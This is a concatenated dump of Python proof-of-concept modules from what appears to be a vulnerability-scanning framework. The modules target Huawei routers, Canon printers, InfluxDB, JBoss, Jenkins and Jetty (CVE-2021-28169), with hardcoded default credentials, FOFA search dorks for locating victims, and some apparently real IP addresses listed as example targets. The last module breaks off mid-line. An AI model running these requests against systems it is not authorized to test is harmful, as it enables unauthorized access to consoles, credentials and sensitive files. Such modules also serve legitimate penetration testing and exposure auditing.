        return self._verify()
--------------------------------------------------------------------------------
/poc/Huawei/Info_Disclosure_DG8045/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Huawei DG8045 ``/api/system/deviceinfo`` information disclosure check.

    One unauthenticated GET with ``X-Requested-With: XMLHttpRequest``; a
    body containing both ``SerialNumber`` and ``DeviceName`` is a hit. The
    HTTP status is not checked. Certificate verification is disabled
    (``verify=False``). ``_info`` is metadata consumed elsewhere in the
    project (``POCBase`` is not visible here).
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2022-01-01",
        "UpdateDate": "2022-01-01",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "华为路由器敏感信息泄露 DG8045 Router 1.0",
        "VulnID": "oFx-2022-0001",  # project-local id; no CVE/CNVD given
        "AppName": "华为DG8045路由器",
        "AppVersion": "1.0版本",
        "VulnDate": "2022-01-01",
        "VulnDesc": "\n路由器默认密码是序列号的最后8位\n",
        "fofa-dork": '\napp="DG8045-Home-Gateway-DG8045"\n',
        "example": "",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when both markers are in the body (any status),
        ``[False, body]`` otherwise. ``requests`` exceptions propagate.
        A hit is demoted to ``False`` when ``self._honeypot_check`` flags
        the body.
        """
        info_url = self.target + "/api/system/deviceinfo"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
            "X-Requested-With": "XMLHttpRequest",
        }
        response = requests.get(
            info_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        matched = "SerialNumber" in page and "DeviceName" in page
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
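class POC(POCBase):
    """Canon iR-ADV C3325 printer unauthenticated web UI check.

    One GET of the root page; a 200 response containing both
    ``设备名称 :`` and ``C3325 (QTS24430)`` is a hit. Certificate
    verification is disabled (``verify=False``). ``_info`` is metadata
    consumed elsewhere in the project (``POCBase`` is not visible here).

    Defect fixed here: the marker test was written as
    ``"设备名称 :" and "C3325 (QTS24430)" in req.text``, which only tests
    the second marker (the first literal is always truthy). Both markers
    are now tested.
    """

    _info = {
        "author": "hansi",
        "version": "1",
        "CreateDate": "2022-10-24",
        "UpdateDate": "2022-10-24",
        "PocDesc": "\n\n",
        "name": "佳能打印机设备存在未授权访问漏洞",
        "VulnID": "oFx-2022-1027",  # project-local id; no CVE/CNVD given
        "AppName": "",
        "AppVersion": "",
        "VulnDate": "2022-10-27",
        "VulnDesc": "\n\n",
        "fofa-dork": "\n\n",
        "example": "",
        "exp_img": "",
    }

    # Body substrings that must all be present for a positive result.
    _MARKERS = ("设备名称 :", "C3325 (QTS24430)")

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and every marker in
        ``_MARKERS`` is present, ``[False, body]`` otherwise. ``requests``
        exceptions propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        root_url = self.target + "/"
        response = requests.get(
            root_url,
            headers={
                "User-Agent": get_random_ua(),
                "Connection": "close",
                "Content-Type": "application/x-www-form-urlencoded",
            },
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        # Each marker is tested individually (previously only the last was).
        all_markers = all(marker in page for marker in self._MARKERS)
        matched = response.status_code == 200 and all_markers
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()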
74 |
--------------------------------------------------------------------------------
/poc/InfluxDB/FingerPrint/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """InfluxDB fingerprint via its ``X-Influxdb-*`` response headers.

    One GET of ``self.target`` itself; the presence of either
    ``X-Influxdb-Version`` or ``X-Influxdb-Build`` in the response headers
    is a hit. Unlike sibling POCs, the second element of the result is the
    response *headers* mapping rather than the body text (the VulnDesc
    says this is intentional, so the headers are shown on the console).
    Certificate verification is disabled (``verify=False``). ``_info`` is
    metadata consumed elsewhere in the project (``POCBase`` is not
    visible here).
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2022-01-01",
        "UpdateDate": "2022-01-01",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "InfluxDB指纹识别",
        "VulnID": "oFx-2022-0001",  # project-local id; no CVE/CNVD given
        "AppName": "InfluxDB",
        "AppVersion": "",
        "VulnDate": "2022-01-01",
        "VulnDesc": """
InfluxDB默认把Web界面运行在8083端口、把API接口运行在8086端口
响应包是会有两个头,分别是X-Influxdb-Version和X-Influxdb-Build

该指纹识别成功后会直接返回header给控制台,方便肉眼识别
""",
        "fofa-dork": '\napp="influxdata-InfluxDB"\n',
        "example": "",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_influxdb, response_headers]``.

        ``[True, headers]`` when either fingerprint header is present,
        ``[False, headers]`` otherwise; the HTTP status is not consulted.
        ``requests`` exceptions propagate. A hit is demoted to ``False``
        when ``self._honeypot_check`` flags the value — note it receives
        the headers mapping, not a string; whether the base class expects
        that is not visible here.
        """
        response = requests.get(
            self.target + "",
            headers={"User-Agent": get_random_ua(), "Connection": "close"},
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        hdrs = response.headers
        fingerprinted = any(name in hdrs for name in ("X-Influxdb-Version", "X-Influxdb-Build"))
        result = [fingerprinted, hdrs]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(hdrs) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/JDFreeFuck/Weak_Pass/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
class POC(POCBase):
    """JDFreeFuck control panel default-credential check.

    POSTs one fixed username/password form to ``/auth``; a 200 response
    containing ``{"err":0}`` is a hit. Certificate verification is
    disabled (``verify=False``). ``_info`` is metadata consumed elsewhere
    in the project (``POCBase`` is not visible here); values are
    reproduced exactly, including the ``ttitle`` dork spelling.
    """

    _info = {
        "author": "hansi",
        "version": "1",
        "CreateDate": "2022-1-10",
        "UpdateDate": "2022-1-10",
        "PocDesc": "\n\n\n",
        "name": "JDFreeFuck后台弱口令漏洞",
        "VulnID": "",  # no CVE/CNVD given
        "AppName": "JD_FreeFuck后台",
        "AppVersion": "无",
        "VulnDate": "2021-05-10",
        "VulnDesc": "\n\n",
        "fofa-dork": '\nttitle="京东薅羊毛控制面板"\n',
        "example": "http://47.106.173.212:5678/",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and ``{"err":0}`` is in the
        body, ``[False, body]`` otherwise. ``requests`` exceptions
        propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        auth_url = self.target + "/auth"
        form = "username=useradmin&password=supermanito"
        response = requests.post(
            auth_url,
            headers={
                "User-Agent": get_random_ua(),
                "Connection": "close",
                # Trailing space reproduced from the original header value.
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8 ",
            },
            data=form,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        matched = '{"err":0}' in page and response.status_code == 200
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Jboss/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
class POC(POCBase):
    """JBoss ``/jmx-console`` unauthenticated access check.

    One GET of ``/jmx-console``; a 200 response containing ``Catalina``
    is a hit. Certificate verification is disabled (``verify=False``).
    ``timeout`` is set on the class; whether it overrides a ``POCBase``
    default is not visible here. ``_info`` is metadata consumed elsewhere
    in the project.
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2021-06-09",
        "UpdateDate": "2021-06-09",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "Jboss未授权访问",
        "VulnID": "",  # no CVE/CNVD given
        "AppName": "Jboss",
        "AppVersion": "低版本",
        "VulnDate": "2021-06-09",
        "VulnDesc": "\n在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码。\n",
        "fofa-dork": "",
        "example": "210.212.62.107:8080",
        "exp_img": "",
    }

    timeout = 10

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and ``Catalina`` is in the
        body, ``[False, body]`` otherwise. ``requests`` exceptions
        propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        console_url = self.target + "/jmx-console"
        response = requests.get(
            console_url,
            headers={"User-Agent": get_random_ua(), "Connection": "close"},
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        matched = response.status_code == 200 and "Catalina" in page
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
74 |
--------------------------------------------------------------------------------
/poc/Jenkins/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
class POC(POCBase):
    """Jenkins ``/script`` console unauthenticated access check.

    One GET of ``/script``; a 200 response containing ``Script Console``
    is a hit. Certificate verification is disabled (``verify=False``).
    ``timeout`` is set on the class; whether it overrides a ``POCBase``
    default is not visible here. ``_info`` is metadata consumed elsewhere
    in the project.
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2021-06-09",
        "UpdateDate": "2021-06-09",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "Jenkins未授权访问",
        "VulnID": "",  # no CVE/CNVD given
        "AppName": "Jenkins",
        "AppVersion": "无",
        "VulnDate": "2021-06-09",
        "VulnDesc": "\nJenkins未设置密码,导致未授权访问。\n",
        "fofa-dork": "",
        "example": "",
        "exp_img": "",
    }

    timeout = 10

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and ``Script Console`` is in
        the body, ``[False, body]`` otherwise. ``requests`` exceptions
        propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        console_url = self.target + "/script"
        response = requests.get(
            console_url,
            headers={"User-Agent": get_random_ua(), "Connection": "close"},
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        matched = response.status_code == 200 and "Script Console" in page
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Jetty/Info_Disclosure_CVE_2021_28169/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | from urllib import request
3 | import ssl
4 | import chardet
5 | from lib.core.common import url_handle,get_random_ua
6 | from lib.core.poc import POCBase
7 |
8 | import urllib3
9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
10 |
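class POC(POCBase):
    """Jetty ConcatServlet double-decoding disclosure check (CVE-2021-28169).

    One GET of ``/static?/%2557EB-INF/web.xml`` through ``urllib.request``
    with an unverified SSL context; a 200 response whose ``Content-Type``
    header value is exactly ``application/xml`` is a hit. ``_info`` is
    metadata consumed elsewhere in the project (``POCBase`` is not
    visible here).

    Defects fixed here: the ``urlopen`` response was never closed (it is
    now used as a context manager), and the always-true test
    ``"" in str(html)`` was removed. The ``except Exception as e: raise e``
    wrapper was dropped as a no-op; exceptions still propagate.
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2021-06-09",
        "UpdateDate": "2021-06-09",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "Jetty Utility Servlets ConcatServlet 双解码信息泄露漏洞 (CVE-2021-28169)",
        "VulnID": "CVE-2021-28169",
        "AppName": "Jetty",
        "AppVersion": "",
        "VulnDate": "2021-06-09",
        "VulnDesc": """
Eclipse Jetty 是一个 Java Web 服务器和 Java Servlet 容器。

在 9.4.40、10.0.2、11.0.2 版本之前,
Jetty Servlets 中的ConcatServlet和WelcomeFilter类受到双重解码错误的影响。
如果开发者手动使用这两个类,攻击者可以利用它们下载WEB-INF目录中的任意敏感文件。
""",
        "fofa-dork": "\n\n",
        "example": "",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_vulnerable, body]``.

        ``[True, body_bytes]`` when the status is 200 and one of the
        ``Content-Type`` header values equals ``application/xml``;
        ``[False, ""]`` otherwise. Note the second element is ``bytes``
        (``response.read()``) on a hit, unlike the ``str`` body sibling
        POCs return. ``urllib`` errors (e.g. ``HTTPError`` for non-2xx)
        propagate to the caller. No ``_honeypot_check`` is applied here.
        """
        vuln = [False, ""]
        url = self.target + "/static?/%2557EB-INF/web.xml"
        headers = {"User-Agent": get_random_ua()}
        # The target's certificate is deliberately not verified.
        context = ssl._create_unverified_context()
        req = request.Request(url, headers=headers)
        # Context manager closes the underlying connection on every path.
        with request.urlopen(req, timeout=self.timeout, context=context) as response:
            html = response.read()
            status_code = response.getcode()
            # Exact-value match: "application/xml;charset=UTF-8" would NOT
            # match. Kept as in the original; relax deliberately if needed.
            content_types = [v for k, v in response.getheaders() if "Content-Type" in k]
        if status_code == 200 and "application/xml" in content_types:
            vuln = [True, html]
        return vuln

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()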
--------------------------------------------------------------------------------
/poc/Kyan/Info_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
# POC metadata consumed elsewhere in the project (the loader is not
# visible here). Values are reproduced exactly; "无" = none.
_info = {
    "author": "hansi & jijue",
    "version": "3",
    "CreateDate": "2021-06-18",
    "UpdateDate": "2021-06-18",
    # Revision notes: v2 reduced false positives, v3 fixed a v2 flaw.
    "PocDesc": "\nv2 原POC逻辑过于简单存在大量误报,现已优化\nv3 v2有缺陷,再次优化\n",
    "name": "Kyan网络监控设备信息泄露",
    "VulnID": "",  # no CVE/CNVD given
    "AppName": "",
    "AppVersion": "无",
    "VulnDate": "2021-03-10",
    "VulnDesc": "\nKyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限\n",
    "fofa-dork": '\ntitle="platform - Login"\n',
    "example": "",
    "exp_img": "",
}
38 |
39 | def _verify(self):
40 | """
41 | 返回vuln
42 |
43 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
44 |
45 | 不存在漏洞:vuln = [False,""]
46 | """
47 | vuln = [False,""]
48 | url = self.target + "/hosts" # url自己按需调整
49 |
50 |
51 | headers = {"User-Agent":get_random_ua(),
52 | "Connection":"close",
53 | # "Content-Type": "application/x-www-form-urlencoded",
54 | }
55 |
56 | try:
57 | """
58 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
59 | """
60 | req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
61 | if req.status_code == 200 and "UserName=" in req.text and "